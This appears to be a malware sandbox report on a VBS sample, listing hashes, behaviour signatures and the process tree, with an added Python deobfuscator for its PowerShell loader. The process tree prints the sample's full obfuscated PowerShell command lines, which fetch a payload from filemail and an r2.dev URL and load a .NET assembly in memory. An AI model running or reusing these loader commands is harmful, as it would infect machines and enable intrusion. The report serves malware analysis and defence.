Analysis
- max time kernel: 121s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20241023-en
- resource tags: arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
- submitted: 14-11-2024 15:57
- Static task: static1
- Behavioral task: behavioral1, sample INQ02010391.vbs, resource win7-20241023-en
- Behavioral task: behavioral2, sample INQ02010391.vbs, resource win10v2004-20241007-en
General
- Target: INQ02010391.vbs
- Size: 137KB
- MD5: ed54f068782aaff84dce2776a3ffbd73
- SHA1: 48a75d4b075131bf9abcfb3b77e64ace881f1b8e
- SHA256: 64c7c1b70a135415a835bb48c638ca47db929b1df28bb62aaacd9cdcac76553b
- SHA512: 9397d85e1e20b36736b6780fe7af5b3b5309ca2096368f3d99d3de3bbdfe348bb55854aef7a726ba55ac4210e19c2ab00bf82dae82a67354c50476217db90ba6
- SSDEEP: 3072:SXs3fFf2ghaYlNAuaq/XDptbxILKDngt5pPGwm:SXSf4eJA0XDjbKG
Malware Config
Extracted
- https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
- Blocklisted process makes network request (2 IoCs)
  flow 5: PID 1668, powershell.exe
  flow 6: PID 1668, powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Run PowerShell and hide display window.
  PID 2672, powershell.exe
  PID 1668, powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  PID 2672, powershell.exe
  PID 1668, powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, PID 2672, powershell.exe
  Token: SeDebugPrivilege, PID 1668, powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  PID 1776 (WScript.exe) wrote to memory of PID 2672 (procid_target 30), reported 3 times
  PID 2672 (powershell.exe) wrote to memory of PID 1668 (procid_target 32), reported 3 times
Processes
1. C:\Windows\System32\WScript.exe (PID 1776)
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INQ02010391.vbs"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2672, child of PID 1776)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKMFFpbWFnZVVybCA9IEk5Ymh0dHBzOi8nKycvMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXJysnbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDJysnNlNRdCcrJ0ljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgSTliO0owUXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7SjBRaW1hZ2VCeScrJ3RlcyA9IEonKycwUXdlYkNsaWVudC5EJysnb3dubG9hZERhdGEoSjBRaW1hZ2VVcmwpO0owUWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKEowUWltYScrJ2dlQnl0ZXMpO0owUXN0YScrJ3J0RmxhZyA9IEk5Yjw8QkFTRTYnKyc0X1MnKydUQVJUPj5JOWI7SjBRZW5kRmxhZyA9IEk5Yjw8QkFTRTY0X0VORD4+STliO0owUXN0YXJ0SW5kZXggPSBKMFEnKydpJysnbWFnZVRleHQuSW5kZXhPZihKMFFzdGFyJysndEZsYWcpOycrJ0owUWVuZEluZGV4ID0gSjBRaW1hZ2VUZXh0LkluZGV4T2YoSjBRZW5kRmxhZyk7SjBRc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIEowUWVuZEluZGV4IC1ndCBKMFFzdGFydEluZGV4O0owUXN0YXJ0SW5kZXgnKycgKz0gSjBRc3RhcnRGbGFnLkxlbmd0aDtKMFFiYXNlNjRMZW5ndGggPSBKMFFlbmRJbmRleCAtIEowUXN0YXJ0SW5kZXg7SjBRYicrJ2FzZTY0Q29tbWFuZCA9IEowUWltYWdlVGV4dC5TdWJzdHJpbmcnKycoSjBRc3RhcnRJbmRleCwgSjBRYmFzZTY0TGVuZ3RoKTtKMFFiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChKMFFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgRW04IEZvckVhY2gtT2JqZWN0IHsgSjBRXyB9KVstMS4uLShKMFFiYXNlNjRDb21tYW5kLkxlbmd0aCldO0owUWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoSjBRYmFzZTY0UmV2ZXJzZWQpO0owUWxvYScrJ2RlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChKMFFjb21tYW5kQnl0ZXMpO0owUXZhaU1ldGhvZCAnKyc9IFtkbicrJ2xpYi5JTy5Ib21lXS5HZXRNZXRob2QoSTliVkFJSTliKTtKMFF2YWlNZXRob2QuSW52b2tlKEowUW51bGwsIEAoSTlidHh0LmNlYS92ZWQuMnIuZDQzOGY3MScrJzU1Y2M2ZWVhOTJkMTRlNjA3NycrJzM3MjgxYzQtYnVwLy86c3B0dGhJOWIsIEk5YmRlc2F0aXZhZG9JOWIsIEk5YmRlc2F0aXZhZG9JOWIsIEk5YmRlc2F0aXZhZG9JOWIsIEk5Yk1TQnVpbGRJOWIsIEk5YmRlc2F0aXYnKydhZG9JOWIsIEk5YmRlc2F0aXZhZG9JOWIsSTliZGVzYXRpdmFkb0k5YixJOWJkZXNhdGl2YWRvSTliLEk5YmRlc2F0aXZhZG9JOWIsSTliZGVzYXRpdicrJ2Fkb0k5YixJOWJkZXNhdGl2YWRvSTliLEk5YjFJOWIsSTliZGVzYXRpdmFkb0k5YikpOycpLlJlUGxBQ2UoJ0owUScsW1N0UmlOZ11bY2hhcl0zNikuUmVQbEFDZSgnSTliJyxbU3RSaU5nXVtjaGFyXTM5KS5SZVBsQUNlKChbY2hhcl02OStbY2hhcl0xMDkrW2NoYXJdNTYpLFtTdFJpTmddW2NoYXJdMTI0KXxJRXg=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1668, child of PID 2672)
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('J0QimageUrl = I9bhttps:/'+'/1017.filemail.com/api/file/get?filekey=2Aa_bW'+'o9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC'+'6SQt'+'IcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f I9b;J0QwebClient = New-Object System.Net.WebClient;J0QimageBy'+'tes = J'+'0QwebClient.D'+'ownloadData(J0QimageUrl);J0QimageText = [System.Text.Encoding]::UTF8.GetString(J0Qima'+'geBytes);J0Qsta'+'rtFlag = I9b<<BASE6'+'4_S'+'TART>>I9b;J0QendFlag = I9b<<BASE64_END>>I9b;J0QstartIndex = J0Q'+'i'+'mageText.IndexOf(J0Qstar'+'tFlag);'+'J0QendIndex = J0QimageText.IndexOf(J0QendFlag);J0QstartIndex -ge 0 -an'+'d J0QendIndex -gt J0QstartIndex;J0QstartIndex'+' += J0QstartFlag.Length;J0Qbase64Length = J0QendIndex - J0QstartIndex;J0Qb'+'ase64Command = J0QimageText.Substring'+'(J0QstartIndex, J0Qbase64Length);J0Qbase64Reversed = -join (J0Qbase64Command.ToCharArray() Em8 ForEach-Object { J0Q_ })[-1..-(J0Qbase64Command.Length)];J0QcommandBytes = [System.Convert]::FromBase64String(J0Qbase64Reversed);J0Qloa'+'dedAs'+'sembly = [System.Reflection.Assembly]::Load(J0QcommandBytes);J0QvaiMethod '+'= [dn'+'lib.IO.Home].GetMethod(I9bVAII9b);J0QvaiMethod.Invoke(J0Qnull, @(I9btxt.cea/ved.2r.d438f71'+'55cc6eea92d14e6077'+'37281c4-bup//:sptthI9b, I9bdesativadoI9b, I9bdesativadoI9b, I9bdesativadoI9b, I9bMSBuildI9b, I9bdesativ'+'adoI9b, I9bdesativadoI9b,I9bdesativadoI9b,I9bdesativadoI9b,I9bdesativadoI9b,I9bdesativ'+'adoI9b,I9bdesativadoI9b,I9b1I9b,I9bdesativadoI9b));').RePlACe('J0Q',[StRiNg][char]36).RePlACe('I9b',[StRiNg][char]39).RePlACe(([char]69+[char]109+[char]56),[StRiNg][char]124)|IEx"
         - Blocklisted process makes network request
         - Command and Scripting Interpreter: PowerShell
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
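The chain above is three stages: WScript runs the VBS, PID 2672 base64-decodes the $Codigo blob into a second command line, and PID 1668 runs that line, which is an obfuscated script wrapped as ('...'+'...').RePlACe(...)|IEX. The three Replace() calls map the tokens J0Q, I9b and Em8 (the last one spelled as [char]69+[char]109+[char]56) back to $, ' and |, the resulting script downloads the filemail URL, cuts the text between <<BASE64_START>> and <<BASE64_END>>, reverses it, base64-decodes it into a .NET assembly, and calls dnlib.IO.Home::VAI with an argument array whose first element is the next-stage URL stored backwards. The following script is an added example (not part of the report and not the sample's own code) that performs that deobfuscation offline: STAGE2 is the PID 1668 command line copied from the process tree with the outer double quotes dropped, and the container text used for the stage-3 extraction test is constructed here, since the real filemail download is not part of the report.

```python
"""Static deobfuscation of the two-stage PowerShell loader in this report.

Added example, not part of the sandbox output. STAGE2 is the decoded command
line of PID 1668 as shown in the process tree; stage 1 (PID 2672) only
base64-decodes it, so nothing else from the sample is needed here.
"""
import base64
import re

# Decoded stage 2, copied from the PID 1668 command line (outer quotes dropped).
STAGE2 = r"""('J0QimageUrl = I9bhttps:/'+'/1017.filemail.com/api/file/get?filekey=2Aa_bW'+'o9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC'+'6SQt'+'IcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f I9b;J0QwebClient = New-Object System.Net.WebClient;J0QimageBy'+'tes = J'+'0QwebClient.D'+'ownloadData(J0QimageUrl);J0QimageText = [System.Text.Encoding]::UTF8.GetString(J0Qima'+'geBytes);J0Qsta'+'rtFlag = I9b<<BASE6'+'4_S'+'TART>>I9b;J0QendFlag = I9b<<BASE64_END>>I9b;J0QstartIndex = J0Q'+'i'+'mageText.IndexOf(J0Qstar'+'tFlag);'+'J0QendIndex = J0QimageText.IndexOf(J0QendFlag);J0QstartIndex -ge 0 -an'+'d J0QendIndex -gt J0QstartIndex;J0QstartIndex'+' += J0QstartFlag.Length;J0Qbase64Length = J0QendIndex - J0QstartIndex;J0Qb'+'ase64Command = J0QimageText.Substring'+'(J0QstartIndex, J0Qbase64Length);J0Qbase64Reversed = -join (J0Qbase64Command.ToCharArray() Em8 ForEach-Object { J0Q_ })[-1..-(J0Qbase64Command.Length)];J0QcommandBytes = [System.Convert]::FromBase64String(J0Qbase64Reversed);J0Qloa'+'dedAs'+'sembly = [System.Reflection.Assembly]::Load(J0QcommandBytes);J0QvaiMethod '+'= [dn'+'lib.IO.Home].GetMethod(I9bVAII9b);J0QvaiMethod.Invoke(J0Qnull, @(I9btxt.cea/ved.2r.d438f71'+'55cc6eea92d14e6077'+'37281c4-bup//:sptthI9b, I9bdesativadoI9b, I9bdesativadoI9b, I9bdesativadoI9b, I9bMSBuildI9b, I9bdesativ'+'adoI9b, I9bdesativadoI9b,I9bdesativadoI9b,I9bdesativadoI9b,I9bdesativadoI9b,I9bdesativ'+'adoI9b,I9bdesativadoI9b,I9b1I9b,I9bdesativadoI9b));').RePlACe('J0Q',[StRiNg][char]36).RePlACe('I9b',[StRiNg][char]39).RePlACe(([char]69+[char]109+[char]56),[StRiNg][char]124)|IEx"""

_CHAR = re.compile(r"\[char\](\d+)", re.IGNORECASE)
_REPLACE = re.compile(r"\.replace\(([^,]+),([^)]+)\)", re.IGNORECASE)
_INVOKE = re.compile(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", re.DOTALL)


def eval_ps_literal(expr: str) -> str:
    """Evaluate the only forms the loader hands to .Replace(): a single-quoted
    literal, or [char]N(+[char]M...) optionally wrapped in () and cast with [string]."""
    codes = _CHAR.findall(expr)
    if codes:
        return "".join(chr(int(c)) for c in codes)
    return expr.strip().strip("()").strip("'")


def deobfuscate(stage: str) -> str:
    """Undo ('a'+'b').Replace(tok, ch).Replace(...)|IEX and return the script
    text that IEX would have executed."""
    body, sep, chain = stage.rpartition("')")  # chain = the Replace() calls + |IEx
    if not sep:
        raise ValueError("no quoted body followed by a Replace chain")
    # Real quotes inside the body were swapped for the I9b token, so every '+'
    # left in it is a concatenation seam and can simply be removed.
    body = body.lstrip("('").replace("'+'", "")
    for m in _REPLACE.finditer(chain):
        body = body.replace(eval_ps_literal(m.group(1)), eval_ps_literal(m.group(2)))
    return body


def invoke_args(script: str) -> list[str]:
    """Pull the argument array passed to dnlib.IO.Home::VAI."""
    m = _INVOKE.search(script)
    if not m:
        raise ValueError("no .Invoke($null, @(...)) call found")
    return [a.strip().strip("'") for a in m.group(1).split(",")]


def payload_url(script: str) -> str:
    """The first VAI argument is the stage-3 URL stored character-reversed."""
    return invoke_args(script)[0][::-1]


def extract_assembly(download_text: str,
                     start: str = "<<BASE64_START>>",
                     end: str = "<<BASE64_END>>") -> bytes:
    """Mirror stage 3: take the text between the markers, reverse it, base64-decode.
    The original evaluates '$startIndex -ge 0 -and $endIndex -gt $startIndex' but
    never branches on the result; here a missing marker is an error instead."""
    s = download_text.find(start)
    e = download_text.find(end)
    if s < 0 or e <= s:
        raise ValueError("BASE64 markers not found or out of order")
    reversed_b64 = download_text[s + len(start):e]
    # FromBase64String ignores whitespace; b64decode without validate= does too.
    return base64.b64decode(reversed_b64[::-1])


def wrap_like_stage3(assembly: bytes) -> str:
    """Build a container in the layout stage 3 expects. Constructed for offline
    testing only; the real download's surrounding text is not in the report."""
    return start_end(base64.b64encode(assembly).decode()[::-1])


def start_end(inner: str) -> str:
    return "<<BASE64_START>>" + inner + "<<BASE64_END>>"


if __name__ == "__main__":
    script = deobfuscate(STAGE2)
    print(script)
    print("stage-3 download:", payload_url(script))
    print("VAI arguments:", invoke_args(script))
```

Running it prints the readable stage-2 script and, from the reversed first argument, the stage-3 URL https://pub-4c182737706e41d29aee6cc5517f834d.r2.dev/aec.txt (a pub-*.r2.dev hostname, which is Cloudflare R2 public-bucket storage). The fifth argument, MSBuild, is presumably the name of the host process for the final payload, but the report does not show that stage, so treat it as an assumption. The extracted .NET assembly is loaded via Assembly.Load from memory and never touches disk, which is why the Downloads section below contains no dropped executable.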
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: bc940bd93a8bf83d9f1544d4c3575e31
  SHA1: e644fd2ebe7dba0ebb54af653d69559389955247
  SHA256: a1539573641a04d6093d48b9fd2292920f268fb6173a3423cf10a406e667309d
  SHA512: 3cbe7116201dd67c4f11d98a7b6925555920f6b7ccb9a4a82480426762d80418e2d1e025c480cebe40e43e08071c34575d4ced7222b8c75451ceb7e05bb028dd
  This is a Windows jump-list file written under the user's Recent folder when an application runs; the AppID 590aee7bdd69b59b is commonly attributed to Windows PowerShell. It is a trace of the PowerShell stages executing, not a payload dropped by the sample.